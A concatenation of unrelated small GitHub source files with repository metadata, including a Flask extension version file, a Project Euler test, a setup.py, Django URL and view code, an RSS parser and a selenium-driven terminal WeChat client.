return frame.D,frame.U
|
[
"adityasundar99@gmail.com"
] |
adityasundar99@gmail.com
|
e43cfaaeee1b2cd2414081c2358a94cdafd5a010
|
961ef96e417e59ca4a372c056eb059becda48c4f
|
/flask_datepicker/about.py
|
e7a66233ea884c93b9f5e155b5f03aacdde7db24
|
[
"MIT"
] |
permissive
|
mrf345/flask_datepicker
|
394216c0a27641103c7a25468106d47b0b812ba6
|
00d6b024943a73f6aa4a9eb4f4d078f3df6571c4
|
refs/heads/master
| 2021-11-18T05:09:54.506643
| 2021-08-08T19:58:15
| 2021-08-08T19:58:15
| 111,988,960
| 17
| 7
|
MIT
| 2021-08-08T19:58:16
| 2017-11-25T08:36:09
|
Python
|
UTF-8
|
Python
| false
| false
| 157
|
py
|
__version__ = '0.14'
__doc__ = 'A Flask extension for jQueryUI DatePicker.'
__license__ = 'MIT'
__author__ = 'Mohamed Feddad'
__email__ = 'mrf345@gmail.com'
|
[
"mrf345@gmail.com"
] |
mrf345@gmail.com
|
54c4a501d9604fa6651f27159ab896dee43bb7d4
|
abd5867e559d2382764fa82419f78d0b1f63cd81
|
/solutions/pe11_test.py
|
a05b6a4efd5cef194cbc224ca5356be8034d3c49
|
[] |
no_license
|
c-ripper/project-euler
|
5c272169b52f834dee9106409158a38ed5d6ee41
|
1f35c2c9f61031fd5c69ec6c0eb4e5a44f999d24
|
refs/heads/master
| 2023-09-02T02:03:01.451371
| 2021-11-22T10:35:32
| 2021-11-22T10:35:32
| 430,596,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
import unittest
from pe11 import solve
class Pe11Test(unittest.TestCase):
def test_solution(self):
self.assertEqual(solve('pe11_numbers.txt'), 70600674)
if __name__ == '__main__':
unittest.main()
|
[
"oleksandr.berezovskyi@ihsmarkit.com"
] |
oleksandr.berezovskyi@ihsmarkit.com
|
0862f3da61b1c40c3b7e1db8e5dfe036f58d74f1
|
ff7d12f148059b2e143fca7d9a7dbab5375bbb5b
|
/taack 5/флаги.py
|
1d0c685ad2821e2ffe833c528808f96cf39516d4
|
[] |
no_license
|
zaur557/python.zzz
|
e74314ceed039da450992edd0757926cffcaa78c
|
9b518cbd8128ae1f1237de81b53d5342beac26c4
|
refs/heads/master
| 2022-07-23T20:06:01.279841
| 2020-05-03T13:36:16
| 2020-05-03T13:36:16
| 260,771,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
n = int(input())
print('+___ '*n)
for z in range(n):
print('|', z+1, ' /', sep='', end=' ')
print()
print('|__\\ '*n)  # escape the backslash; '\ ' is an invalid escape sequence
print('| '*n)
|
[
"noreply@github.com"
] |
zaur557.noreply@github.com
|
c3485c1b87104bdfcb1876b021628d9304df1c00
|
229d7b0de4416b068821eb5193a640a22d5c11e1
|
/setup.py
|
eda9c624e79a1c24fe8aabe04fee2005158be613
|
[
"MIT"
] |
permissive
|
peleg525/large_data_to_teradata
|
99be81930ee82280482238b982f86199b0152641
|
6172ec5f8eb00ac324620ff3501f50be418a21df
|
refs/heads/main
| 2023-06-20T08:01:40.065548
| 2021-07-13T12:38:47
| 2021-07-13T12:38:47
| 385,582,545
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
from distutils.core import setup
setup(
name = 'large_data_to_teradata', # How you named your package folder (MyLib)
  packages = ['large_data_to_teradata'],   # Choose the same as "name"
version = '0.1', # Start with a small number and increase it with every change you make
  license='MIT',        # Choose a license from here: https://help.github.com/articles/licensing-a-repository
description = 'Push large dataframe to teradata', # Give a short description about your library
author = 'Peleg Wurzel', # Type in your name
author_email = 'Peleg525@gmail.com', # Type in your E-Mail
url = 'https://github.com/peleg525/large_data_to_teradata.git', # Provide either the link to your github or to your website
download_url = 'https://github.com/peleg525/large_data_to_teradata/archive/refs/tags/V_01.tar.gz', # I explain this later on
keywords = ['teradata'], # Keywords that define your package best
install_requires=[ # I get to this in a second
'pandas',
'teradatasql',
'tqdm',
'numpy'
],
classifiers=[
    'Development Status :: 3 - Alpha',      # Choose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
    'Programming Language :: Python :: 3',      # Specify which Python versions you want to support
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'],
)
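# Editor's note -- a typical workflow for building and publishing a package
# defined by a setup script like this one (generic packaging commands, not
# something provided by this repository):
#
#   python setup.py sdist     # build the source distribution into dist/
#   pip install twine         # twine performs the PyPI upload
#   twine upload dist/*       # publish using your PyPI credentials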
|
[
"noreply@github.com"
] |
peleg525.noreply@github.com
|
4d30c6fc70954ba966aeeee5d1eb33d9f5a4aafe
|
d47f58c08828a41576634cc53b86eb519f60f15d
|
/uploads/urls.py
|
7a17822747a49dbe578fe807447992266b6b5709
|
[
"MIT"
] |
permissive
|
doyenraj/mint_upload
|
be8160943540f3c94ed049dee4c941dc9a5fb330
|
1a5ec7b9bf4254f3eb46054b316b40a85beeb5e9
|
refs/heads/master
| 2023-08-30T04:08:15.109202
| 2021-11-01T12:28:51
| 2021-11-01T12:28:51
| 423,398,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
from django.conf.urls import url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from uploads.core import views
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^uploads/simple/$', views.simple_upload, name='simple_upload'),
url(r'^uploads/form/$', views.model_form_upload, name='model_form_upload'),
url(r'^uploads/nft/$', views.nft_upload, name='nft_upload'),
url(r'^admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"rajnish@goodhills-group.com"
] |
rajnish@goodhills-group.com
|
61f98b001adb1e268bc9bd6fcb3bb509e4aefae9
|
4811776819714b138a5dbbc122c8544c44ce3c89
|
/predict/__main__.py
|
ba359ef293d146cfd63e9b11a2e8b10d486290d4
|
[] |
no_license
|
lemfaer/funny
|
0bb412345afa80c6d8f01eca6f4ea7ecf6c80da3
|
748e0be727d2027a7cc8744206403b9561c2fd0b
|
refs/heads/master
| 2021-09-17T11:08:27.841168
| 2018-07-01T08:56:38
| 2018-07-01T08:56:38
| 110,134,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
from predict import Predict
from sys import exit
from args import *
from db import *
import json
data = {
"type" : None,
"ratio" : {},
"top" : []
}
try:
cnx = connect(**base)
svms, ngrams = select_last_weights(cnx)
indexes = select_indexes(cnx)
predict = Predict(svms, indexes, ngrams)
uid = predict.text([text]).pop()
predict.calc()
data["type"] = predict.type(uid)
data["ratio"] = predict.ratio(uid)
data["top"] = predict.top()
except:
pass
finally:
data = json.dumps(data)
print(data)
exit(0)
|
[
"lemfaer@gmail.com"
] |
lemfaer@gmail.com
|
55b5d85be3348bd45f1b520c279dea3e7d9c7f02
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_chancing.py
|
39d3766b4c248139ad54c2197c4e7174569df972
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
from xai.brain.wordbase.verbs._chance import _CHANCE
#calss header
class _CHANCING(_CHANCE, ):
def __init__(self,):
_CHANCE.__init__(self)
self.name = "CHANCING"
self.specie = 'verbs'
self.basic = "chance"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f49a1d86de2af8ee7a8b700298597fa86773f976
|
b6b3c01f29eb4ca0b4a11a12b7844c7971dd936c
|
/reddit_comments/views.py
|
2b6e51522817625656efb7677fda31f6a49521e1
|
[] |
no_license
|
jjmalina/trollolol
|
b3bfbbadfba8f55c84727d0cf412d26e66620996
|
e9831f95dbd45317f4f4905e9fd009094556d6e3
|
refs/heads/master
| 2020-11-26T21:10:16.863955
| 2013-04-02T22:54:08
| 2013-04-02T22:54:08
| 6,016,385
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import simplejson as json
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from reddit_comments.models import Submission, Comment
def index(request):
submissions = []
for submission in Submission.find():
item = {'submission': submission, 'comments': []}
for comment in submission.comments:
item['comments'].append(comment)
submissions.append(item)
context = {'submissions': submissions}
return render(request, 'reddit_comments/index.html', context)
@csrf_exempt
def classify_comment(request):
"""Ajax view when the user classifies the comment themself"""
data = json.loads(request.POST['classify'])
label = data['label']
object_id = data['objectId']
comment = Comment.find_one({'object_id': object_id})
comment.is_troll = label
comment.is_classified = True
comment.save()
response = {
'status': 'success',
'label': label,
'objectId': object_id
}
return HttpResponse(json.dumps(response))
|
[
"jmalina327@gmail.com"
] |
jmalina327@gmail.com
|
616423f2f0453fe8f46d5f221992ce4636cbc09a
|
6aee8f6182b2cf15d5c6ddc742b3f2e17a261442
|
/parser.py
|
74d54cbe33d152f68d442caae46803b4ca5392d5
|
[] |
no_license
|
StanislavNesterovich/parser
|
9f80950966dc72a23b6a6d0cc96520cdcb1aab58
|
cc568939c182eb2865bee4c2c86fbffa6f70315a
|
refs/heads/master
| 2020-04-19T12:39:02.416525
| 2019-07-31T12:15:18
| 2019-07-31T12:15:18
| 168,197,702
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
py
|
import yaml
with open("document.yaml", 'r') as stream:
try:
a = (yaml.load(stream))
except yaml.YAMLError as exc:
print(exc)
print(a["defaults"])
print(a["defaults"]["volumes"])
for i in a["defaults"]["volumes"].keys():
    print(i)
    print(a["defaults"]["volumes"][i])
|
[
"stanislau.nestsiarovich@netcracker.com"
] |
stanislau.nestsiarovich@netcracker.com
|
a5f0ed870c87007fcf9f22bae53d58e56ed5e7dd
|
dda6c484dde9bf5c59473d44c5e934487f13b0ea
|
/textils/textils/wsgi.py
|
1d8abc0c4d6d536778a66638f058cebfb8cc51bc
|
[] |
no_license
|
shreyasingh12/Django-Project
|
439e83f95740a58ed15f28fda7b16ae6af206a23
|
07c1bbe7c19dc12abc3109b02b9b1ea10cfa6170
|
refs/heads/master
| 2021-06-13T04:41:45.141103
| 2020-04-10T09:31:39
| 2020-04-10T09:31:39
| 254,424,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for textils project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'textils.settings')
application = get_wsgi_application()
|
[
"sshreya0003@gmail.com"
] |
sshreya0003@gmail.com
|
e3af2107bc4abb9ae14e143512c4ae6befccfb9a
|
6402c19d74b278064d7672cb15b50e549cc79f36
|
/message.py
|
5359883d46536ca1ac0ecb21229ec60c91b6bdaf
|
[] |
no_license
|
rifiuto/pyqt
|
5e46954e3361a78c36308380d0a38a49536c8fa5
|
40300b63f4854379c17015f3826de1801eb0a665
|
refs/heads/master
| 2023-09-03T22:06:48.700310
| 2021-11-09T15:18:21
| 2021-11-09T15:18:31
| 425,777,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 702
|
py
|
import sys
from PyQt5.QtWidgets import QWidget, QApplication, QMessageBox, QDesktopWidget
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.resize(400, 400)
self.show()
def closeEvent(self, event):
reply = QMessageBox.question(self, 'message', "Do you want to quit",\
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def main():
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
[
"sayno@rifiuto.localdomain"
] |
sayno@rifiuto.localdomain
|
1ca06445b4a6681d07bd80c25c813c17a9d99f3b
|
0cc4eb3cb54f8394c127ace62d3108fdb5230c85
|
/.spack-env/view/lib/python3.7/encodings/utf_32_be.py
|
fcf11fbab5dd8d16c2cb243fe427707815df6409
|
[] |
no_license
|
jacobmerson/spack-develop-env
|
5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8
|
5fca20ca343b1a76f05fc635c87f94ed25417d94
|
refs/heads/master
| 2022-07-04T02:22:50.264727
| 2020-05-06T05:13:50
| 2020-05-06T05:13:50
| 261,657,112
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
/lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/python-3.7.7-oihhthdoxtgh4krvzpputn5ozwcnq2by/lib/python3.7/encodings/utf_32_be.py
|
[
"mersoj@rpi.edu"
] |
mersoj@rpi.edu
|
8184744e49878c1d75bddc0aecfa8c735b903048
|
fced246b0bf2e7ca0ddfe32d71bcae008b98bb42
|
/migrations/__init__.py
|
8f982d30238f9f4e8a4d0e11bee0db2439d80d6d
|
[] |
no_license
|
jackscodemonkey/reads_db
|
b0af2231213977a7670876dd4c2beed60b0182ae
|
13e433652fce648a95704badb261b3ca2a771d8c
|
refs/heads/main
| 2023-01-03T10:18:41.756971
| 2020-11-04T01:39:29
| 2020-11-04T01:39:29
| 309,837,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 41
|
py
|
__version__ = '1.0'
__release__ = '1.0.0'
|
[
"marcus.robb@initworx.com"
] |
marcus.robb@initworx.com
|
055d26a5da7e57c84e37a554e274c996150f4e8e
|
673af02550d4d26ff0a8bcecb4175a0a6b24378f
|
/appointment_scheduler.py
|
1c406595a6f8f529c269ed169101d9717670e388
|
[] |
no_license
|
OMRYZUTA/Appointments
|
1cb0665638bffcd1f48163b7646b2a29ec52f9e2
|
26f00da30c7600406b0196782eb244694f3e8509
|
refs/heads/master
| 2023-08-20T02:27:45.436806
| 2021-06-25T07:04:54
| 2021-06-25T07:04:54
| 378,819,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,404
|
py
|
from db_connector import DbConnector
from login_system import LoginSystem
class AppointmentScheduler():
def __init__(self):
doctors_list = DbConnector.get_doctors_list()
self.doctors_list = list(map(
lambda x: LoginSystem.doctor_log_in(x[0], x[1]), doctors_list))
self.doctor_dict = dict(
map(lambda x: (x.user_name, x), self.doctors_list))
def get_available_doctors(self):
return list(filter(lambda x: not x.is_busy, self.doctors_list))
def make_appointment(self, doctor_user_name, patient):
treated = self.doctor_dict[doctor_user_name].try_treat(patient)
result = 'entered to waiting list'
if(treated):
result = 'being treated'
return result
def cancel_appointment(self, doctor_user_name, patient):
removed = False
if(patient.remove_from_waiting_list(doctor_user_name)):
treated = self.doctor_dict[doctor_user_name].waiting_list.remove_patient(
patient)
result = 'removed from waiting list'
else:
result = "already began the appointment, can't cancel"
return result
def is_doctor_exist(self, doctor_user_name):
return doctor_user_name in self.doctor_dict.keys()
def get_doctor_waiting_list(self, doctor_user_name):
return self.doctor_dict[doctor_user_name].waiting_list
|
[
"omrizu@mta.ac.il"
] |
omrizu@mta.ac.il
|
aed104fefaad1dcac7d795078c44b562c6e58c95
|
c546ea8fe008f2cb11e9b7dfa2e5220ee6601c7b
|
/read_rss.py
|
32277004a840cb131caae29bbf5d461df4744da6
|
[] |
no_license
|
MariaChowdhury/Parser
|
df535de2ce5d3d92ee9a42d6ba5f87f49135e87a
|
c516b95bb9fc574cefea7086af1d236d09a7075b
|
refs/heads/master
| 2020-03-29T18:04:46.807570
| 2018-09-25T02:03:25
| 2018-09-25T02:03:25
| 150,193,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,163
|
py
|
#Python code to illustrate parsing of XML files
# importing the required modules
import csv
import requests
import xml.etree.ElementTree as ET
def loadRSS():
# url of rss feed
url = 'https://onlinebooks.library.upenn.edu/newrss.xml'
# creating HTTP response object from given url
resp = requests.get(url)
# saving the xml file
with open('onlinebooks.xml', 'wb') as f:
f.write(resp.content)
def parseXML(xmlfile):
# create element tree object
tree = ET.parse(xmlfile)
# get root element
root = tree.getroot()
# create empty list for news items
newsitems = []
# iterate book item
for item in root.findall('./channel/item'):
print(item)
# empty news dictionary
# append news dictionary to news items list
newsitems.append(item)
# return news items list
return newsitems
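# Editor's sketch (not in the original file): a minimal savetoCSV() matching the
# commented-out call in main() below; the field names are assumptions based on
# common RSS item tags and may need adjusting.
def savetoCSV(newsitems, filename='onlinebooks.csv'):
    fields = ['title', 'link', 'description']
    with open(filename, 'w', newline='') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fields)
        writer.writeheader()
        for item in newsitems:
            # each item is an ElementTree <item> element; missing children become ''
            writer.writerow({f: (item.findtext(f) or '') for f in fields})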
def main():
# load rss from web to update existing xml file
loadRSS()
# parse xml file
newsitems = parseXML('onlinebooks.xml')
# store news items in a csv file
#savetoCSV(newsitems)
if __name__ == "__main__":
# calling main function
main()
|
[
"maria.chowdhury@gmail.com"
] |
maria.chowdhury@gmail.com
|
f46004245901b5a26d8f52428fb53ff149b9c996
|
3c0458db82bc58ac57820fc82291ecadfa99458f
|
/wechit.py
|
d54b71d4396caa9ed9d9d844dc4ace5e5d9dbe35
|
[
"MIT"
] |
permissive
|
user01010011/wechit
|
1bce91723ba62e15489bdd8110ba10c7174e001d
|
18de1a3bc23691cd6faa859181384822bc46b813
|
refs/heads/master
| 2022-04-13T22:11:15.602716
| 2020-02-27T04:03:21
| 2020-02-27T04:03:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,381
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import time
from PIL import Image, ImageOps, ImageStat, ImageEnhance
import os
import sys
from glob import glob
import re
import json
import random
import shutil
IS_PYTHON3 = sys.version_info > (3, 0) # supports python 2 and 3
LOGIN_SCREEN_FILE = "./temp/login-screen.png" # temp file for qr code
MSG_IMG_FILE = "./temp/msg-img.png" # temp file for in-chat images
IS_RETINA = True # mac with a retina display?
# terminal window dimensions
TERM_ROWS = 24
TERM_COLUMNS = 80
# chrome driver settings
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("safebrowsing-disable-extension-blacklist")
chrome_options.add_argument("--safebrowsing-disable-download-protection")
chrome_options.add_experimental_option("prefs", {'safebrowsing.enabled': 'false'})
if IS_PYTHON3:
unicode = str # in python 3, unicode and str are unified
# welcome!
def print_splash_screen():
icon = """
---------------------------------------------------------------------
_________
| ___ |
|( oo)___ | WECHIT - WECHat In Terminal
| v-/oo )|
| '--\| | Powered by python + selenium, (c) Lingdong Huang 2018
'---------'
---------------------------------------------------------------------
"""
iconcolor = """
?????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????
?#########???????????????????????????????????????????????????????????
?#########????@@@@@@@????????????????????????????????????????????????
?#########???????????????????????????????????????????????????????????
?#########??????????????????????????????????????&&&&&&&&&&&&&&&&&&&??
?????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????
"""
g = lambda s: color_text(s,37,42)
w = lambda s: color_text(s,32,40)
b = lambda s: color_text(s,30,47)
p = lambda s: s
result=""
for t0,t1 in zip(icon.split("\n"),iconcolor.split("\n")):
for c0,c1 in zip(list(t0),list(t1)):
result += g(c0) if c1 == "#" else (w(c0) if c1 == "@" else (b(c0) if c1 == "&" else p(c0)))
result += "\n"
return result
# initialize chrome driver and navigate to "WeChat for Web"
def init_driver(path=os.path.join(os.getcwd(),"chromedriver")):
driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=path)
driver.get("https://web.wechat.com")
return driver
# observe and update terminal dimensions
def get_term_shape():
global TERM_ROWS, TERM_COLUMNS
if IS_PYTHON3:
result = tuple(reversed(list(shutil.get_terminal_size((TERM_COLUMNS, TERM_ROWS)))))
else:
result = tuple([int(x) for x in os.popen('stty size', 'r').read().split()])
TERM_ROWS,TERM_COLUMNS = result
return result
# retrieve a function for mapping RGB values to ANSI color escape codes
def get_color_mapper(file):
dat = json.loads(open(file,'r').read())
color_map = {tuple([int(y) for y in x.split(" ")]):dat[x] for x in dat}
def nearest(r,g,b):
d0 = None
k0 = None
for k in color_map:
d = (k[0]-r)**2+(k[1]-g)**2+(k[2]-b)**2
if k0 is None or d <= d0:
k0 = k
d0 = d
return color_map[k0]
return nearest
color_mapper = get_color_mapper("colormap.json")
# apply ANSI color escape codes
def color_text(s,fg,bg,bold=True):
format = ';'.join([str(int(bold)), str(fg), str(bg)])
return '\x1b[%sm%s\x1b[0m' % (format,s)
# remove ANSI color escape codes
def uncolor_text(s):
s = re.sub(r"\x1b\[.*?;.*?;.*?m", "", s)
s = re.sub(r"\x1b\[0m","",s)
return s
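# Editor's example of the two helpers above (values chosen for illustration):
# color_text('hi', 30, 47) returns '\x1b[1;30;47mhi\x1b[0m' (bold, black text on
# a white background), and uncolor_text() strips the escape codes back off, so
# uncolor_text(color_text('hi', 30, 47)) == 'hi'.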
# num of characters in width when given string is printed in terminal
# chinese characters are typically 2, ascii characters are 1
def rendered_len(s):
while True:
try:
return sum([(1 if ord(x) < 256 else 2) for x in unrender_unicode(uncolor_text(s))])
except:
try:
return sum([(1 if ord(x) < 256 else 2) for x in uncolor_text(s)])
except:
return rendered_len(s[:-1])
# draw a box made of ASCII characters around some text (auto wraps)
def box_text(s,caption="",w=40,fg=30,bg=42):
iw = w-4
lines = s.split("\n")
result = ".-"+caption[:w-4]+("-"*(iw-rendered_len(caption)))+"-."+"\n"
def strslice(s,n):
for i in range(len(s)*2):
if rendered_len(s[:i]) >= n:
return s[:i], s[i:]
return s,''
def renderline(l):
a,b = strslice(l,iw)
return "|"+color_text(" "+a+(" "*max(0,iw-rendered_len(a)))+" ",fg,bg)+"|" \
+ ("\n"+renderline(b) if b != "" else "")
result += "\n".join([renderline(l) for l in lines])
result += "\n'-"+("-"*iw)+"-'"
return result
# draw a box around some ASCII art
def box_image(im,w=40,caption=""):
iw = w-4
s = print_thumbnail(im,width=iw)
lines = [l for l in s.split("\n") if len(l) > 0]
result = ".-"+caption+("-"*(iw-rendered_len(caption)))+"-."+"\n"
def renderline(l):
return "| "+l+" |"
result += "\n".join([renderline(l) for l in lines])
result += "\n'-"+("-"*iw)+"-'"
return result
# align block of text 'left' or 'right' or 'center' by padding whitespaces
def align_text(s,w=80,align="left"):
lines = s.split("\n")
result = ""
for l in lines:
n = (w-rendered_len(l))
sp = " "
if align == "left":
result += l+sp*n
elif align == "center":
result += (sp*(n//2))+l+(sp*(n-n//2))
elif align == "right":
result += (sp*n)+l
result += "\n"
return result
# convert a PIL image to ASCII art
def print_image(im, x_step=12, y_step=24, calc_average=False):
W,H = im.size
result = ""
for i in range(0,H,y_step):
for j in range(0,W,x_step):
if calc_average:
roi = im.crop((j,i,min(W-1,j+x_step),min(H-1,i+y_step)))
col = ImageStat.Stat(roi).mean
else:
col = im.getpixel((min(W-1,j+x_step//2),min(H-1,i+y_step//2)))
conf = color_mapper(*(col[:3]))
result += color_text(*conf)
result += "\n"
return result
# convert a PIL image to ASCII art given output width in characters
def print_thumbnail(im,width=64):
W,H = im.size
x_step = int(float(W)/width)
y_step = x_step * 2
converter = ImageEnhance.Color(im)
im = converter.enhance(2)
return print_image(im,x_step=x_step,y_step=y_step,calc_average=False)
# get bounding box of html element on screen
def get_rect(elem):
s = 1+IS_RETINA
rect = elem.location['x']*s, elem.location['y']*s, (elem.location['x']+elem.size['width'])*s, (elem.location['y']+elem.size['height'])*s
return rect
# fetch login QR code as PIL image
def get_qr_code(driver):
os.system("rm "+LOGIN_SCREEN_FILE)
print("retrieving qr code...")
driver.get_screenshot_as_file(LOGIN_SCREEN_FILE)
qrelem = driver.find_element_by_class_name("qrcode").find_element_by_class_name("img")
rect = get_rect(qrelem)
while len(glob(LOGIN_SCREEN_FILE)) == 0:
time.sleep(0.5)
im = Image.open(LOGIN_SCREEN_FILE).crop(rect)
if abs(im.getpixel((1, 1))[0] - 204) < 10:
print("qr code is still loading, trying again...")
time.sleep(1)
return get_qr_code(driver)
print("qr code retrieved!")
return im
# convert QR code to ASCII art
def print_qr_code(im):
black_token = color_text(" ",37,40)
white_token = color_text(" ",30,47)
im = im.resize((540,540))
uw = 12
icnt = 38
W,H = im.size
pad = (W-uw*icnt)//2
result = ""
for i in range(icnt):
result += white_token
for j in range(icnt):
x,y = pad+uw*j, pad+uw*i
b = im.getpixel((x+uw//2,y+uw//2))[0] < 128
if b:
result += black_token
else:
result += white_token
result += white_token+"\n"
whiterow = white_token*(icnt+2)
return whiterow+"\n"+result+whiterow+"\nscan to log in to wechat"
# universal method for querying user for string input
def ask_for(q):
if IS_PYTHON3:
return input(q)
else:
return raw_input(q)
# wait for chat window to load (right after logging in)
def wait_for_chat_window(driver):
while True:
try:
if len(get_username(driver)) > 0:
return
except:
pass
time.sleep(0.5)
# convert formatted unicode entry points to unicode characters
def render_unicode(s):
return re.sub(r"\\u.{4}", lambda x: chr(int(x.group(0)[2:],16)), s)
# decode unicode
def unrender_unicode(s):
if IS_PYTHON3:
return s
return s.decode("utf-8")
# remove wechat-specific emoji's
def no_emoji(s):
return re.sub(r"<img.*>", "*", s)
# sends both 'enter' and 'return' key multiple times to make sure wechat get it
def send_enter(elem):
for i in range(5):
time.sleep(0.1)
elem.send_keys(Keys.ENTER)
elem.send_keys(Keys.RETURN)
# get my own username
def get_username(driver):
return render_unicode(no_emoji(
driver.find_element_by_class_name("give_me").find_element_by_class_name("display_name").get_attribute("innerHTML")
))
# get a list of recent conversation partners
def list_conversations(driver):
names = []
while len(names) == 0:
try:
names = driver.find_element_by_id("J_NavChatScrollBody").find_elements_by_class_name("nickname_text")
except:
pass
names = [x.get_attribute("innerHTML") for x in names]
names = [render_unicode(no_emoji(name)) for name in names]
return names
# start a conversation with someone
# (immplementation: search their name in the search bar and press enter)
def goto_conversation(driver, name="File Transfer"):
search = driver.find_element_by_id("search_bar").find_element_by_class_name("frm_search")
search.send_keys(name)
send_enter(search)
return driver.find_element_by_id("chatArea").find_element_by_class_name("title_name").get_attribute("innerHTML")
# get a list of recent messages with current friend
def list_messages(driver):
elems = driver.find_element_by_id("chatArea").find_element_by_class_name("chat_bd").find_elements_by_class_name("message")
msgs = []
for e in elems:
try:
author = render_unicode(no_emoji(e.find_element_by_class_name("avatar").get_attribute("title")))
content = e.find_elements_by_class_name("content")[-1]
except:
continue
message = ""
txts = content.find_elements_by_class_name("js_message_plain")
pics = content.find_elements_by_class_name("msg-img")
if len(txts) > 0:
message = txts[0].get_attribute("innerHTML")
elif len(pics) > 0:
driver.get_screenshot_as_file(MSG_IMG_FILE)
rect = get_rect(pics[0])
im = Image.open(MSG_IMG_FILE).crop(rect)
message = im
else:
message = "<!> message type not supported. please view it on your phone."
msgs.append((author,message))
return msgs
# render message history as ASCII art
def print_messages(msgs, my_name="", cols=80):
result = ""
for i in range(len(msgs)):
author = msgs[i][0]
message = msgs[i][1]
if author == my_name:
align,fg,bg = "right",30,42
else:
align,fg,bg = "left", 30,47
if type(message) in [str, unicode]:
result += align_text(box_text(message,w=min(cols,64,rendered_len(message)+4),caption=" "+author+" ",fg=fg,bg=bg),w=cols,align=align)+"\n"
elif type(message) is Image.Image:
result += align_text(box_image(message,w=min(cols,64),caption=" "+author+" "),w=cols,align=align)+"\n"
return result
# send plain text message to current friend
def send_message(driver, msg="Hello there!"):
field = driver.find_element_by_class_name("box_ft").find_element_by_id("editArea")
field.send_keys(unrender_unicode(msg))
send_enter(field)
# send file to current friend by full path
def upload_file(driver,file_path):
btn = driver.find_element_by_class_name("box_ft").find_element_by_class_name("js_fileupload")
try:
inp = btn.find_element_by_class_name("webuploader-element-invisible")
inp.send_keys(file_path)
return True
except:
return False
# download all the recent files
# chromedriver seems to bug out in this when in headless mode
def download_files(driver):
elems = driver.find_element_by_id("chatArea").find_element_by_class_name("chat_bd").find_elements_by_class_name("message")
for e in elems:
try:
content = e.find_elements_by_class_name("content")[-1]
except:
continue
pics = content.find_elements_by_class_name("msg-img")
atts = content.find_elements_by_class_name("attach")
while True:
try:
if len(pics) > 0:
pics[0].click()
down_clicked = False
while True:
try:
time.sleep(0.1)
close_btn = driver.find_element_by_class_name("J_Preview").find_element_by_class_name("img_preview_close")
down_btn = driver.find_element_by_class_name("J_Preview").find_elements_by_class_name("img_opr_item")[1]
if not down_clicked:
down_btn.click()
down_clicked = True
time.sleep(0.1)
close_btn.click()
print("image download initiated.")
break
except:
pass
if len(atts) > 0:
while True:
try:
atts[0].find_element_by_class_name("opr").find_element_by_class_name("ng-scope").click()
print("generic attachment download initiated.")
break
except:
pass
break
except:
pass
return True
# main app
def main():
get_term_shape()
print(print_splash_screen())
get_term_shape()
if TERM_ROWS < 50 or TERM_COLUMNS < 80:
print("your terminal window ("+str(TERM_COLUMNS)+"x"+str(TERM_ROWS)+") is too small. please resize it to 80x50 or larger.")
ask_for("press enter to continue...")
print("initializing driver...")
driver = init_driver()
time.sleep(1)
im = get_qr_code(driver)
get_term_shape()
print(align_text(print_qr_code(im),w=TERM_COLUMNS,align="center"))
wait_for_chat_window(driver)
print("logged in as \""+get_username(driver)+"\"! loading chats...")
